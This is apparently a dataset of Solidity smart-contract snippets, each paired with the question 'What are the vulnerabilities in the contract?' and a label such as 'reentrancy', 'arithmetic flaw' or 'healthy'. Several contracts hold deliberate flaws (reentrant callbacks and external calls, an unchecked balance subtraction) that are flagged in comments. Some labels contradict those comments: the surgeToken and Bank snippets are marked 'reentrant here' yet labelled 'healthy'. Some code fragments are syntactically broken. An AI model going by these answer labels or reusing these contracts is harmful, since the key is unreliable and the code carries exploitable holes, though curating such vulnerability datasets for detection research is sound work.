73         require(from == msg.sender || IVisor(from).owner() == msg.sender, "Sender must own the tokens");
74         vvisr.burn(from, shares);
75     }

76     function snapshot() external onlyOwner {
77       vvisr.snapshot();
78     }

79     function transferOwnership(address newOwner) external onlyOwner {
80       owner = newOwner;
81     }

82     function transferTokenOwnership(address newOwner) external onlyOwner {
83       vvisr.transferOwnership(newOwner); 
84     }

85     function isContract(address _addr) private returns (bool isContract){
86                                 uint32 size;
87                                 assembly {
88                                         size := extcodesize(_addr)
89                                 }
90                                 return (size > 0);
91                 }

92 }
What are the vulnerabilities in the contract?
incorrect visibility/ownership
reentrancy
<end of text>
1 // Sources flattened with hardhat v2.1.2 https://hardhat.org

2 // File contracts/v0.4/token/linkERC20Basic.sol

3 pragma solidity ^0.4.11;


4 /**
5  * @title ERC20Basic
6  * @dev Simpler version of ERC20 interface
7  * @dev see https://github.com/ethereum/EIPs/issues/179
8  */
9 contract linkERC20Basic {
10   uint256 public totalSupply;
11   function balanceOf(address who) constant returns (uint256);
12   function transfer(address to, uint256 value) returns (bool);
13   event Transfer(address indexed from, address indexed to, uint256 value);
14 }


15 // File contracts/v0.4/token/linkERC20.sol


16 /**
17  * @title ERC20 interface
18  * @dev see https://github.com/ethereum/EIPs/issues/20
19  */
20 contract linkERC20 is linkERC20Basic {
21   function allowance(address owner, address spender) constant returns (uint256);
22   function transferFrom(address from, address to, uint256 value) returns (bool);
23   function approve(address spender, uint256 value) returns (bool);
24   event Approval(address indexed owner, address indexed spender, uint256 value);
25 }


26 // File contracts/v0.4/token/ERC677.sol


27 contract ERC677 is linkERC20 {
28   function transferAndCall(address to, uint value, bytes data) returns (bool success);

29   event Transfer(address indexed from, address indexed to, uint value, bytes data);
30 }


31 // File contracts/v0.4/token/ERC677Receiver.sol


32 contract ERC677Receiver {
33   function onTokenTransfer(address _sender, uint _value, bytes _data);
34 }


35 // File contracts/v0.4/ERC677Token.sol

36 contract ERC677Token is ERC677 {

37   /**
38   * @dev transfer token to a contract address with additional data if the recipient is a contact.
39   * @param _to The address to transfer to.
40   * @param _value The amount to be transferred.
41   * @param _data The extra data to be passed to the receiving contract.
42   */
43   function transferAndCall(address _to, uint _value, bytes _data)
44     public
45     returns (bool success)
46   {
47     super.transfer(_to, _value);
48     Transfer(msg.sender, _to, _value, _data);
49     if (isContract(_to)) {
50       contractFallback(_to, _value, _data);
51     }
52     return true;
53   }


54   // PRIVATE
55  //bug: this is the buggy fall back that allows reentrancy
56   function contractFallback(address _to, uint _value, bytes _data)
57     private
58   {
59     ERC677Receiver receiver = ERC677Receiver(_to);
60     receiver.onTokenTransfer(msg.sender, _value, _data);
61   }

62   function isContract(address _addr)
63     private
64     returns (bool hasCode)
65   {
66     uint length;
67     assembly { length := extcodesize(_addr) }
68     return length > 0;
69   }

70 }


71 abstract contract CToken {
        
72         function doTransferOut(address payable to, uint amount) virtual internal;

73         doTransferOut(borrower, borrowAmount);
        
74         /* We write the previously calculated values into storage */
75         accountBorrows[borrower].principal = vars.accountBorrowsNew;
76         accountBorrows[borrower].interestIndex = borrowIndex;
77         totalBorrows = vars.totalBorrowsNew;
 
78         /* We emit a Borrow event */
79         emit Borrow(borrower, borrowAmount, vars.accountBorrowsNew, vars.totalBorrowsNew);

80 }
81 // File contracts/v0.4/math/linkSafeMath.sol



82 /**
83  * @title SafeMath
84  * @dev Math operations with safety checks that throw on error
85  */
86 library linkSafeMath {
87   function mul(uint256 a, uint256 b) internal constant returns (uint256) {
88     uint256 c = a * b;
89     assert(a == 0 || c / a == b);
90     return c;
91   }

92   function div(uint256 a, uint256 b) internal constant returns (uint256) {
93     // assert(b > 0); // Solidity automatically throws when dividing by 0
94     uint256 c = a / b;
95     // assert(a == b * c + a % b); // There is no case in which this doesn't hold
96     return c;
97   }

98   function sub(uint256 a, uint256 b) internal constant returns (uint256) {
99     assert(b <= a);
100     return a - b;
101   }

102   function add(uint256 a, uint256 b) internal constant returns (uint256) {
103     uint256 c = a + b;
104     assert(c >= a);
105     return c;
106   }
107 }
What are the vulnerabilities in the contract?

<end of text>
1 pragma solidity ^0.5.0;

2 contract ModifierEntrancy {

3   mapping (address => uint) public tokenBalance;
4   string constant name = "Nu Token";
5   Bank bank;
  
6   constructor() public{
7       bank = new Bank();
8   }

9   //If a contract has a zero balance and supports the token give them some token
10   function airDrop() hasNoBalance supportsToken  public{
11     tokenBalance[msg.sender] += 20;
12   }
  
13   //Checks that the contract responds the way we want
14   modifier supportsToken() {
15     require(keccak256(abi.encodePacked("Nu Token")) == bank.supportsToken());
16     _;
17   }
  
18   //Checks that the caller has a zero balance
19   modifier hasNoBalance {
20       require(tokenBalance[msg.sender] == 0);
21       _;
22         }
23   }

24 contract Bank{

25     function supportsToken() external returns(bytes32) {
26         return keccak256(abi.encodePacked("Nu Token"));
27     }

28 }
What are the vulnerabilities in the contract?
healthy
<end of text>
1 /**
2  *Submitted for verification at BscScan.com on 2021-07-30
3 */

4 //SPDX-License-Identifier: MIT
5 pragma solidity ^0.8.0;


6 abstract contract ReentrancyGuard {
7         uint256 private constant _NOT_ENTERED = 1;
8         uint256 private constant _ENTERED = 2;
9         uint256 private _status;
10         constructor () {
11             _status = _NOT_ENTERED;
12         }
    
13         modifier nonReentrant() {
14             require(_status != _ENTERED, "ReentrancyGuard: reentrant call");
15             _status = _ENTERED;
16             _;
17             _status = _NOT_ENTERED;
18         }
19     }


20 contract surgeToken{
  
21   /** Sells SURGE Tokens And Deposits the BNB into Seller's Address */
22     function sell(uint256 tokenAmount) public nonReentrant returns (bool) {
        
23         address seller = msg.sender;
        
24         // make sure seller has this balance
25         require(_balances[seller] >= tokenAmount, 'cannot sell above token amount');
        
26         // calculate the sell fee from this transaction
27         uint256 tokensToSwap = tokenAmount.mul(sellFee).div(10**2);
        
28         // how much BNB are these tokens worth?
29         uint256 amountBNB = tokensToSwap.mul(calculatePrice());
        
30         //reentrant happens here: during call fallback, the attacker invoked purchase multiple times
31         (bool successful,) = payable(seller).call{value: amountBNB, gas: 40000}(""); 
32         if (successful) {
33             // subtract full amount from sender
34             _balances[seller] = _balances[seller].sub(tokenAmount, 'sender does not have this amount to sell');
35             // if successful, remove tokens from supply
36             _totalSupply = _totalSupply.sub(tokenAmount);
37         } else {
38             revert();
39         }
40         emit Transfer(seller, address(this), tokenAmount);
41         return true;
42     }

    
43     function purchase(address buyer, uint256 bnbAmount) internal returns (bool) {
44         // make sure we don't buy more than the bnb in this contract
45         require(bnbAmount <= address(this).balance, 'purchase not included in balance');
46         // previous amount of BNB before we received any        
47         uint256 prevBNBAmount = (address(this).balance).sub(bnbAmount);
48         // if this is the first purchase, use current balance
49         prevBNBAmount = prevBNBAmount == 0 ? address(this).balance : prevBNBAmount;
50         // find the number of tokens we should mint to keep up with the current price
51         uint256 nShouldPurchase = hyperInflatePrice ? _totalSupply.mul(bnbAmount).div(address(this).balance) : _totalSupply.mul(bnbAmount).div(prevBNBAmount);
52         // apply our spread to tokens to inflate price relative to total supply
53         uint256 tokensToSend = nShouldPurchase.mul(spreadDivisor).div(10**2);
54         // revert if under 1
55         if (tokensToSend < 1) {
56             revert('Must Buy More Than One Surge');
57         }
58     }

59 }
    
What are the vulnerabilities in the contract?
healthy
<end of text>
1 /**
2  *Submitted for verification at Etherscan.io on 2020-10-07
3 */

4 // File: openzeppelin-solidity-2.3.0/contracts/ownership/Ownable.sol

5 pragma solidity ^0.5.0;

6 contract Bank{


7 //reentrant here 
8     function work(uint256 id, address goblin, uint256 loan, uint256 maxReturn, bytes calldata data)
9         external payable
10         onlyEOA accrue(msg.value)
11     {
12         // 1. Sanity check the input position, or add a new position of ID is 0.
13         if (id == 0) {
14             id = nextPositionID++;
15             positions[id].goblin = goblin;
16             positions[id].owner = msg.sender;
17         } else {
18             require(id < nextPositionID, "bad position id");
19             require(positions[id].goblin == goblin, "bad position goblin");
20             require(positions[id].owner == msg.sender, "not position owner");
21         }
22         emit Work(id, loan);
23         // 2. Make sure the goblin can accept more debt and remove the existing debt.
24         require(config.isGoblin(goblin), "not a goblin");
25         require(loan == 0 || config.acceptDebt(goblin), "goblin not accept more debt");
26         uint256 debt = _removeDebt(id).add(loan);
27         // 3. Perform the actual work, using a new scope to avoid stack-too-deep errors.
28         uint256 back;
29         {
30             uint256 sendETH = msg.value.add(loan);
31             require(sendETH <= address(this).balance, "insufficient ETH in the bank");
32             uint256 beforeETH = address(this).balance.sub(sendETH);
33             Goblin(goblin).work.value(sendETH)(id, msg.sender, debt, data);
34             back = address(this).balance.sub(beforeETH);
35         }
36         // 4. Check and update position debt.
37         uint256 lessDebt = Math.min(debt, Math.min(back, maxReturn));
38         debt = debt.sub(lessDebt);
39         if (debt > 0) {
40             require(debt >= config.minDebtSize(), "too small debt size");
41             uint256 health = Goblin(goblin).health(id);
42             uint256 workFactor = config.workFactor(goblin, debt);
43             require(health.mul(workFactor) >= debt.mul(10000), "bad work factor");
44             _addDebt(id, debt);
45         }
46         // 5. Return excess ETH back.
47         if (back > lessDebt) SafeToken.safeTransferETH(msg.sender, back - lessDebt);
48     }
49 }
  
What are the vulnerabilities in the contract?
healthy
<end of text>
1 pragma solidity >=0.4.24 <0.6.0;

2 contract A {

3    function get_a()  public returns (uint) {
4        return 2;
5    }
6 }

7 contract NestedFunction {

8     A a;
9     uint count = 0;

10     constructor () public {
11     } 

12     function foo(uint x) internal returns (uint ret) {
13         ret = x + 1;
14     }

15     function far(uint x) public {
16         assert(foo(x) == x + 1);
17     }

18     function baz(uint x) public {
19        uint y;
20        y = foo(foo(x) + 2);
21        assert (y == x + 4);
22     }

23     function bar() public {
24        assert(a.get_a() == 2);
25     }
   
26     function fooW(uint x) private returns (uint){
27        count ++; 
28        return foo(x) + count;
29     }

30     function unhandled(uint x) public {
31        uint y;
32        y = foo(foo(x) + foo(foo(x)));
33        assert (y == 2*x + 4); 
34     }

35 }
What are the vulnerabilities in the contract?
healthy
<end of text>
1 pragma solidity >=0.4.24 <0.6.0;

2 contract LoopNestedWhile {

3     uint[2][2] a;

4     function testNestedWhileLoop() public {
5         uint i = 0;
6         while (i < 2) {
7             uint j = 0;
8             while (j < 2) {
9                 a[i][j] = i * 2 + j;
10                 j += 1;
11             }
12             i += 1;
13         }
14         assert (a[0][0] == 0);
15         assert (a[0][1] == 1);
16         assert (a[1][0] == 2);
17         assert (a[1][1] == 3);
18     }

19 }
What are the vulnerabilities in the contract?
healthy
<end of text>
1 pragma solidity >=0.4.24 <0.6.0;

2 contract MappingNested {

3     mapping (uint => mapping (uint => uint)) m;
4     mapping (uint => uint[]) n;
5     uint[] p;
  

6     constructor() public {
7         // assert(m[0][22] == 0); 

8         m[10][20] = 11;
9         m[20][10] = 21;
10         assert (m[10][20] == 11);
11         assert (m[20][10] == 21);
12         assert (n[0].length == 0);
13         n[0].push(22);
14         n[0].push(33);
15         assert (n[0].length == 2);
16         assert (n[1].length == 0); 
17         assert (p.length == 0); 
18     }

19 }
What are the vulnerabilities in the contract?
healthy
<end of text>
1 pragma solidity >=0.4.24 <0.6.0;

2 //simple library with no internal state

3 library Lib {
4     function add(uint _a, uint _b) public view returns (uint r) {
5         address x = address(this);
6         assert(x == msg.sender);
7         r = _a + _b;
8     }
9 }

10 contract C {
11     // using Lib for uint;

12     function foo() public {
13         uint x = 1;
14         uint y = 2;
15         uint z = Lib.add(x, y);
16         assert (z == 3);
17     }
18 }
What are the vulnerabilities in the contract?
healthy
<end of text>
1 pragma solidity >=0.4.24 <0.6.0;

2 // This test passes, but assertion on line 35 is only proved
3 // up to 4 transactions
4 // This result means that ctor A is only called once, for B, as A(x+1)
5 // Compare this test with ConstructorChaining2_fail.sol: no ctor args there,
6 // so the workaround in the compiler doesn't work, and the base ctor is called twice 


7 // Example of the trace:
8 // D(x) is called, where x is 716
9 // B(x+3) called, where x is 716, B's arg is 719
10 // A(x+1) called, where x is 720. A's arg is 720
11 // ctor A {a = x} , where a is 720
12 // ctor B  {b = x+1 } , where x is 719, b is 720
13 // C(x+4) is called, where x is 716, C's arg is 720
14 // ctor C   { c = x + 2}, where x is 720, c is 722

15 contract A {
16     uint a;
17     constructor (uint x) public {
18         a = x;
19     }
20 }

21 contract B is A {
22     uint b;
23     constructor (uint x) A(x+1) public {  
24         b = x + 1;
25                 assert(a == x + 1);
26     }
27 }

28 contract C is A {
29     uint c;
30     //constructor (uint x) A(x+2) public {          // no A with ANY args here, otherwise, solc error:
31                                                                                                         // "Base constr args given twice"
32         constructor (uint x) public {
33         c = x + 2;
34                 assert(a == x);       // passes, but proved to only 4 transactions        
35     }
36 }

37 contract D is B, C {
38     constructor (uint x) B(x+3) C(x+4) public
39     {        
40         assert (a == x + 4);  //after calling B(x+3); calling C(x+4) does not affect this assert
41         assert (b == x + 4);  //after calling B(x+3)
42         assert (c == x + 6);    // after calling C(x+4)
43     }
44 }
What are the vulnerabilities in the contract?
healthy
<end of text>
1 pragma solidity >=0.4.24 <0.6.0;
2 contract B {
3    function funcB() public pure returns (uint) {
4        return 42;
5    }
6    constructor() public {}
7 }

8 contract A {
9    function funcA1() public pure returns (uint) {
10        return 11;
11    }
12    function funcA2(uint x) public pure returns (uint) {
13        return x+1;
14    }
15    function funcA3() public returns (B) {
16        B retVal= new B();
17        return retVal;
18    }
19    constructor() public
20     {
21                 assert(funcA2(funcA1())==12);
22             assert(funcA3().funcB()==42);
23     }
24 }
What are the vulnerabilities in the contract?
healthy
<end of text>
1 pragma solidity ^0.5.0;

2 import "./IERC20.sol";
3 import "./SafeMath.sol"; //import "../../math/SafeMath.sol";
4 import "./Libraries/VeriSolContracts.sol"; //change 

5 contract ERC20 is IERC20 {
6     using SafeMath for uint256;

7     mapping (address => uint256) private _balances;

8     mapping (address => mapping (address => uint256)) private _allowances;

9     uint256 private _totalSupply;


  
10     constructor (uint256 totalSupply) public {
11        require(msg.sender != address(0));
12        _totalSupply = totalSupply;
13        _balances[msg.sender] = totalSupply;
14     }


 
15     function totalSupply() public view returns (uint256) {
16         return _totalSupply;
17     }

 
18     function balanceOf(address account) public view returns (uint256) {
19         return _balances[account];
20     }

  
21     function transfer(address recipient, uint256 amount) public returns (bool) {
22         _transfer(msg.sender, recipient, amount);
23         assert (_balances[msg.sender] + _balances[recipient]) == _balances[msg.sender] + _balances[recipient];
24         assert (msg.sender == recipient ||  _balances[msg.sender] == _balances[msg.sender] - amount);
25         assert (_balances[recipient] >= _balances[recipient]);

26         return true;
27     }

28     function allowance(address owner, address spender) public view returns (uint256) {
29         return _allowances[owner][spender];
30     }

31     function approve(address spender, uint256 value) public returns (bool) {
32         _approve(msg.sender, spender, value);
33         return true;
34     }

35     function transferFrom(address sender, address recipient, uint256 amount) public returns (bool) {
36         _transfer(sender, recipient, amount);
37         _approve(sender, msg.sender, _allowances[sender][msg.sender].sub(amount));
38         return true;
39     }


40     function increaseAllowance(address spender, uint256 addedValue) public returns (bool) {
41         _approve(msg.sender, spender, _allowances[msg.sender][spender].add(addedValue));
42         return true;
43     }

 
44     function decreaseAllowance(address spender, uint256 subtractedValue) public returns (bool) {
45         _approve(msg.sender, spender, _allowances[msg.sender][spender].sub(subtractedValue));
46         return true;
47     }


 
48     function _transfer(address sender, address recipient, uint256 amount) internal {
49         require(sender != address(0), "ERC20: transfer from the zero address");
50         require(recipient != address(0), "ERC20: transfer to the zero address");

51         _balances[sender] = _balances[sender] - amount; // _balances[sender].sub(amount); // BUG
52         _balances[recipient] = _balances[recipient].add(amount);
53         emit Transfer(sender, recipient, amount);
54     }

 
55     function _mint(address account, uint256 amount) internal {
56         require(account != address(0), "ERC20: mint to the zero address");

57         _totalSupply = _totalSupply.add(amount);
58         _balances[account] = _balances[account].add(amount);
59         emit Transfer(address(0), account, amount);
60     }

 
61     function _burn(address account, uint256 value) internal {
62         require(account != address(0), "ERC20: burn from the zero address");

63         _totalSupply = _totalSupply.sub(value);
64         _balances[account] = _balances[account].sub(value);
65         emit Transfer(account, address(0), value);
66     }

67     /**
68      * @dev Sets `amount` as the allowance of `spender` over the `owner`s tokens.
69      *
70      * This is internal function is equivalent to `approve`, and can be used to
71      * e.g. set automatic allowances for certain subsystems, etc.
72      *
73      * Emits an {Approval} event.
74      *
75      * Requirements:
76      *
77      * - `owner` cannot be the zero address.
78      * - `spender` cannot be the zero address.
79      */
80     function _approve(address owner, address spender, uint256 value) internal {
81         require(owner != address(0), "ERC20: approve from the zero address");
82         require(spender != address(0), "ERC20: approve to the zero address");

83         _allowances[owner][spender] = value;
84         emit Approval(owner, spender, value);
85     }

86     function _burnFrom(address account, uint256 amount) internal {
87         _burn(account, amount);
88         _approve(account, msg.sender, _allowances[account][msg.sender].sub(amount));
89     }

90      function contractInvariant() private view {
91          assert(_totalSupply == VeriSol.SumMapping(_balances);
92      }


93 }
What are the vulnerabilities in the contract?
arithmetic flaw
<end of text>

1 pragma solidity ^0.4.11;

2 interface tokenRecipient { function receiveApproval(address _from, uint256 _value, address _token, bytes _extraData); }

3 contract owned {
4     address public owner;

5     function owned() {
6         owner = msg.sender;
7     }

8     modifier onlyOwner {
9         require(msg.sender == owner);
10         _;
11     }

12     function transferOwnership(address newOwner) onlyOwner {
13         owner = newOwner;
14     }
15 }

16 contract PylonToken is owned {
17     // Public variables of the token
18     string public standard = "Pylon Token - The first decentralized energy exchange platform powered by renewable energy";
19     string public name = 'Pylon Token';
20     string public symbol = 'PYLNT';
21     uint8 public decimals = 18;
22     uint256 public totalSupply = 3750000000000000000000000;

23     // This creates an array with all balances
24     mapping (address => uint256) public balanceOf;
25     mapping (address => bool) public frozenAccount;

26     // This notifies about accounts locked
27     event FrozenFunds(address target, bool frozen);

28     // This generates a public event on the blockchain that will notify clients
29     event Transfer(address indexed from, address indexed to, uint256 value);

30     // This notifies clients about the amount burnt
31     event Burn(address indexed from, uint256 value);

32     using SafeMath for uint256;

33     address public beneficiary = 0xAE0151Ca8C9b6A1A7B50Ce80Bf7436400E22b535;  //Chip-chap Klenergy Address of ether beneficiary account
34     uint256 public fundingGoal = 21230434782608700000000;     // Foundig goal in weis = 21230,434782608700000000 Ethers
35     uint256 public amountRaised;    // Quantity of weis investeds
36     uint256 public deadline; // durationInMinutes * 60 / 17 + 5000;        // Last moment to invest
37     uint256 public price = 6608695652173910;           // Ether cost of each token in weis 0,006608695652173910 ethers

38     uint256 public totalTokensToSend = 3250000000000000000000000; // Total tokens offered in the total ICO

39     uint256 public maxEtherInvestment = 826086956521739000000; //Ethers. To mofify the day when starts crowdsale, equivalent to 190.000€ = 826,086956521739000000 ether
40     uint256 public maxTokens = 297619047619048000000000; // 297,619.047619048000000000 PYLNT = 190.000 € + 56% bonus

41     uint256 public bonusCap = 750000000000000000000000; // 750,000.000000000000000000 PYLNT last day before Crowdsale as 1,52€/token
42     uint256 public pylonSelled = 0;

43     uint256 public startBlockBonus;

44     uint256 public endBlockBonus1;

45     uint256 public endBlockBonus2;

46     uint256 public endBlockBonus3;

47     uint256 public qnt10k = 6578947368421050000000; // 6,578.947368421050000000 PYLNT = 10.000 €

48     bool fundingGoalReached = false; // If founding goal is reached or not
49     bool crowdsaleClosed = false;    // If crowdsale is closed or open

50     event GoalReached(address deposit, uint256 amountDeposited);
51     event FundTransfer(address backer, uint256 amount, bool isContribution);
52     event LogQuantity(uint256 _amount, string _message);

53     // Chequear
54     uint256 public startBlock = getBlockNumber();

55     bool public paused = false;

56     //uint256 public balanceInvestor;
57     //uint256 public ultimosTokensEntregados;

58     modifier contributionOpen() {
59         require(getBlockNumber() >= startBlock && getBlockNumber() <= deadline);
60         _;
61     }

62     modifier notPaused() {
63         require(!paused);
64         _;
65     }

66     function crowdsale() onlyOwner{
67         paused = false;
68     }

69     event TokenPurchase(address indexed purchaser, address indexed investor, uint256 value, uint256 amount);


70     function PylonToken(
71         uint256 initialSupply,
72         string tokenName,
73         uint8 decimalUnits,
74         string tokenSymbol,
75         address centralMinter,
76         address ifSuccessfulSendTo,
77         uint256 fundingGoalInWeis,
78         uint256 durationInMinutes,
79         uint256 weisCostOfEachToken
80     ) {
81         if (centralMinter != 0) owner = centralMinter;

82         balanceOf[msg.sender] = initialSupply;              // Give the creator all initial tokens
83         totalSupply = initialSupply;                        // Update total supply
84         name = tokenName;                                   // Set the name for display purposes
85         symbol = tokenSymbol;                               // Set the symbol for display purposes
86         decimals = decimalUnits;                            // Amount of decimals for display purposes

87         beneficiary = ifSuccessfulSendTo;
88         fundingGoal = fundingGoalInWeis;
89         startBlock = getBlockNumber();
90         startBlockBonus = getBlockNumber();
91         endBlockBonus1 = getBlockNumber() + 15246 + 12600 + 500;    // 3 days + 35,5h + margen error = 15246 + 12600 + 500
92         endBlockBonus2 = getBlockNumber() + 30492 + 12600 + 800;    // 6 days + 35,5h + margen error = 30492 + 12600 + 800
93         endBlockBonus3 = getBlockNumber() + 45738 + 12600 + 1100;   // 9 days + 35,5h + margen error = 45738 + 12600 + 1100
94         deadline = getBlockNumber() + (durationInMinutes * 60 / 17) + 5000; // durationInMinutes * 60 / 17 + 12600 + 5000 = Calculo bloques + margen error
95         price = weisCostOfEachToken;
96     }


97     function _transfer(address _from, address _to, uint _value) internal {
98         require(_to != 0x0);                             
99         require(balanceOf[_from] >= _value);                
100         require(balanceOf[_to] + _value > balanceOf[_to]);  
101         require(!frozenAccount[_from]);                     
102         require(!frozenAccount[_to]);                      
103         balanceOf[_from] -= _value;                         
104         balanceOf[_to] += _value;                          
105         Transfer(_from, _to, _value);
106     }


107     function transfer(address _to, uint256 _value) {
108         _transfer(msg.sender, _to, _value);
109     }


110     function burn(uint256 _value) onlyOwner returns (bool success) {
111         require(balanceOf[msg.sender] >= _value);   // Check if the sender has enough
112         balanceOf[msg.sender] -= _value;            // Subtract from the sender
113         totalSupply -= _value;                      // Updates totalSupply
114         Burn(msg.sender, _value);
115         return true;
116     }

  
117     function burnFrom(address _from, uint256 _value) onlyOwner returns (bool success) {
118         require(balanceOf[_from] >= _value);                // Check if the targeted balance is enough
119         balanceOf[_from] -= _value;                         // Subtract from the targeted balance
120         totalSupply -= _value;                              // Update totalSupply
121         Burn(_from, _value);
122         return true;
123     }


124     function mintToken(address target, uint256 mintedAmount) onlyOwner {
125         balanceOf[target] += mintedAmount;
126         totalSupply += mintedAmount;
127         Transfer(0, owner, mintedAmount);
128         Transfer(owner, target, mintedAmount);
129     }


130     function freezeAccount(address target, bool freeze) onlyOwner {
131         frozenAccount[target] = freeze;
132         FrozenFunds(target, freeze);
133     }


134     function () payable notPaused{
135         buyTokens(msg.sender);
136     }

137     // low level token purchase function
138     function buyTokens(address investor) payable notPaused {
139         require (!crowdsaleClosed); // Check if crowdsale is open or not
140         require(investor != 0x0);  
141         require(validPurchase()); 
142         require(maxEtherInvestment >= msg.value); 
143         require(balanceOf[investor] <= maxTokens); 
144         require(amountRaised <= fundingGoal); 
145         require(pylonSelled <= totalTokensToSend); 


146         //Check if It's time for pre ICO or ICO
147         if(startBlockBonus <= getBlockNumber() && startBlock <= getBlockNumber() && endBlockBonus3 >= getBlockNumber() && pylonSelled <= bonusCap){
148           buyPreIco(investor);
149         } else if(deadline >= getBlockNumber()){
150           buyIco(investor);
151         }

152     }

153     function buyIco(address investor) internal{
154       uint256 weiAmount = msg.value;

155       // calculate token amount to be sent
156       uint256 tokens = weiAmount.mul(10**18).div(price);

157       require((balanceOf[investor] + tokens) <= maxTokens);    
158       require(balanceOf[this] >= tokens);           
159       require(pylonSelled + tokens <= totalTokensToSend);
160      balanceOf[this] -= tokens;
161       balanceOf[investor] += tokens;
162       amountRaised += weiAmount; // update state amount raised
163       pylonSelled += tokens; // Total tokens selled

164       beneficiary.transfer(weiAmount); //Transfer ethers to beneficiary

165       frozenAccount[investor] = true;
166       FrozenFunds(investor, true);

167       TokenPurchase(msg.sender, investor, weiAmount, tokens);
168     }

169     function buyPreIco(address investor) internal{
170       uint256 weiAmount = msg.value;

171       uint256 bonusPrice = 0;
172       uint256 tokens = weiAmount.mul(10**18).div(price);

173       if(endBlockBonus1 >= getBlockNumber()){
174         if(tokens == qnt10k.mul(19) ){
175           bonusPrice = 2775652173913040;
176         }else if(tokens >= qnt10k.mul(18) && tokens < qnt10k.mul(19)){
177           bonusPrice = 2907826086956520;
178         }else if(tokens >= qnt10k.mul(17) && tokens < qnt10k.mul(18)){
179           bonusPrice = 3040000000000000;
180         }else if(tokens >= qnt10k.mul(16) && tokens < qnt10k.mul(17)){
181           bonusPrice = 3172173913043480;
182         }else if(tokens >= qnt10k.mul(15) && tokens < qnt10k.mul(16)){
183           bonusPrice = 3304347826086960;
184         }else if(tokens >= qnt10k.mul(14) && tokens < qnt10k.mul(15)){
185           bonusPrice = 3436521739130430;
186         }else if(tokens >= qnt10k.mul(13) && tokens < qnt10k.mul(14)){
187           bonusPrice = 3568695652173910;
188         }else if(tokens >= qnt10k.mul(12) && tokens < qnt10k.mul(13)){
189           bonusPrice = 3700869565217390;
190         }else if(tokens >= qnt10k.mul(11) && tokens < qnt10k.mul(12)){
191           bonusPrice = 3833043478260870;
192         }else if(tokens >= qnt10k.mul(10) && tokens < qnt10k.mul(11)){
193           bonusPrice = 3965217391304350;
194         }else if(tokens >= qnt10k.mul(9) && tokens < qnt10k.mul(10)){
195           bonusPrice = 4097391304347830;
196         }else if(tokens >= qnt10k.mul(8) && tokens < qnt10k.mul(9)){
197           bonusPrice = 4229565217391300;
198         }else if(tokens >= qnt10k.mul(7) && tokens < qnt10k.mul(8)){
199           bonusPrice = 4361739130434780;
200         }else if(tokens >= qnt10k.mul(6) && tokens < qnt10k.mul(7)){
201           bonusPrice = 4493913043478260;
202         }else if(tokens >= qnt10k.mul(5) && tokens < qnt10k.mul(6)){
203           bonusPrice = 4626086956521740;
204         }else{
205           bonusPrice = 5286956521739130;
206         }
207       }else if(endBlockBonus2 >= getBlockNumber()){
208         if(tokens == qnt10k.mul(19) ){
209           bonusPrice = 3436521739130430;
210         }else if(tokens >= qnt10k.mul(18) && tokens < qnt10k.mul(19)){
211           bonusPrice = 3568695652173910;
212         }else if(tokens >= qnt10k.mul(17) && tokens < qnt10k.mul(18)){
213           bonusPrice = 3700869565217390;
214         }else if(tokens >= qnt10k.mul(16) && tokens < qnt10k.mul(17)){
215           bonusPrice = 3833043478260870;
216         }else if(tokens >= qnt10k.mul(15) && tokens < qnt10k.mul(16)){
217           bonusPrice = 3965217391304350;
218         }else if(tokens >= qnt10k.mul(14) && tokens < qnt10k.mul(15)){
219           bonusPrice = 4097391304347830;
220         }else if(tokens >= qnt10k.mul(13) && tokens < qnt10k.mul(14)){
221           bonusPrice = 4229565217391300;
222         }else if(tokens >= qnt10k.mul(12) && tokens < qnt10k.mul(13)){
223           bonusPrice = 4361739130434780;
224         }else if(tokens >= qnt10k.mul(11) && tokens < qnt10k.mul(12)){
225           bonusPrice = 4493913043478260;
226         }else if(tokens >= qnt10k.mul(10) && tokens < qnt10k.mul(11)){
227           bonusPrice = 4626086956521740;
228         }else if(tokens >= qnt10k.mul(9) && tokens < qnt10k.mul(10)){
229           bonusPrice = 4758260869565220;
230         }else if(tokens >= qnt10k.mul(8) && tokens < qnt10k.mul(9)){
231           bonusPrice = 4890434782608700;
232         }else if(tokens >= qnt10k.mul(7) && tokens < qnt10k.mul(8)){
233           bonusPrice = 5022608695652170;
234         }else if(tokens >= qnt10k.mul(6) && tokens < qnt10k.mul(7)){
235           bonusPrice = 5154782608695650;
236         }else if(tokens >= qnt10k.mul(5) && tokens < qnt10k.mul(6)){
237           bonusPrice = 5286956521739130;
238         }else{
239           bonusPrice = 5947826086956520;
240         }
241       }else{
242         if(tokens == qnt10k.mul(19) ){
243           bonusPrice = 3766956521739130;
244         }else if(tokens >= qnt10k.mul(18) && tokens < qnt10k.mul(19)){
245           bonusPrice = 3899130434782610;
246         }else if(tokens >= qnt10k.mul(17) && tokens < qnt10k.mul(18)){
247           bonusPrice = 4031304347826090;
248         }else if(tokens >= qnt10k.mul(16) && tokens < qnt10k.mul(17)){
249           bonusPrice = 4163478260869570;
250         }else if(tokens >= qnt10k.mul(15) && tokens < qnt10k.mul(16)){
251           bonusPrice = 4295652173913040;
252         }else if(tokens >= qnt10k.mul(14) && tokens < qnt10k.mul(15)){
253           bonusPrice = 4427826086956520;
254         }else if(tokens >= qnt10k.mul(13) && tokens < qnt10k.mul(14)){
255           bonusPrice = 4560000000000000;
256         }else if(tokens >= qnt10k.mul(12) && tokens < qnt10k.mul(13)){
257           bonusPrice = 4692173913043480;
258         }else if(tokens >= qnt10k.mul(11) && tokens < qnt10k.mul(12)){
259           bonusPrice = 4824347826086960;
260         }else if(tokens >= qnt10k.mul(10) && tokens < qnt10k.mul(11)){
261           bonusPrice = 4956521739130430;
262         }else if(tokens >= qnt10k.mul(9) && tokens < qnt10k.mul(10)){
263           bonusPrice = 5088695652173910;
264         }else if(tokens >= qnt10k.mul(8) && tokens < qnt10k.mul(9)){
265           bonusPrice = 5220869565217390;
266         }else if(tokens >= qnt10k.mul(7) && tokens < qnt10k.mul(8)){
267           bonusPrice = 5353043478260870;
268         }else if(tokens >= qnt10k.mul(6) && tokens < qnt10k.mul(7)){
269           bonusPrice = 5485217391304350;
270         }else if(tokens >= qnt10k.mul(5) && tokens < qnt10k.mul(6)){
271           bonusPrice = 5617391304347830;
272         }else{
273           bonusPrice = 6278260869565220;
274         }
275       }

276       tokens = weiAmount.mul(10**18).div(bonusPrice);

277       require(pylonSelled + tokens <= bonusCap); // Check if want to sell more than total tokens for pre-ico
278       require(balanceOf[investor] + tokens <= maxTokens); // Check if the investor has more tokens than 5% of total supply
279       require(balanceOf[this] >= tokens);             // checks if it has enough to sell

280       balanceOf[this] -= tokens;
281       balanceOf[investor] += tokens;
282       amountRaised += weiAmount; // update state amount raised
